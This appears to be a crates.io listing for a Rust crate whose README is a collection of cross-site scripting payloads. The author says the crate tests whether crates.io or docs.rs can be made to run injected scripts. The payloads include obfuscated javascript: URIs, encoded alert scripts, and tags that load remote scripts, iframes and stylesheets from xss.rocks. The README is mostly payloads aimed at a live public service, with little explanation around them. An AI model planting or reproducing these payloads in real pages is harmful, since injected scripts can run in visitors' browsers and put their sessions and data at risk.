6 releases

Uses old Rust 2015

0.1.5 Dec 27, 2017
0.1.4 Dec 27, 2017

#6 in #xss

ISC license

8KB

Testing for JS injection

Try a meta tag

<style> h1 { color: red !important; } </style>

This crate is just a test; I'm trying to find out if cargo.io and/or docs.rs may be vulnerable to XSS.

Try to hover this image

Try to execute JavaScript with the src attribute in an img tag

<img src=j&#X41vascript:alert('Injected from poisoned src from img tag in README.md')>

<IMG SRC=java\0script:alert("XSS")>

<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://xss.rocks/xss.js?< B ></SCRIPT>

<SCRIPT SRC=//xss.rocks/.j>

<iframe src=http://xss.rocks/scriptlet.html <</iframe>

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Try to click this anchor

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

<script> alert(String.fromCharCode(73, 110, 106, 101, 99, 116, 101, 100, 32, 102, 114, 111, 109, 32, 115, 99, 114, 105, 112, 116, 32, 116, 97, 103, 32, 105, 110, 32, 82, 69, 65, 68, 77, 69, 46, 109, 100)); </script>

No runtime deps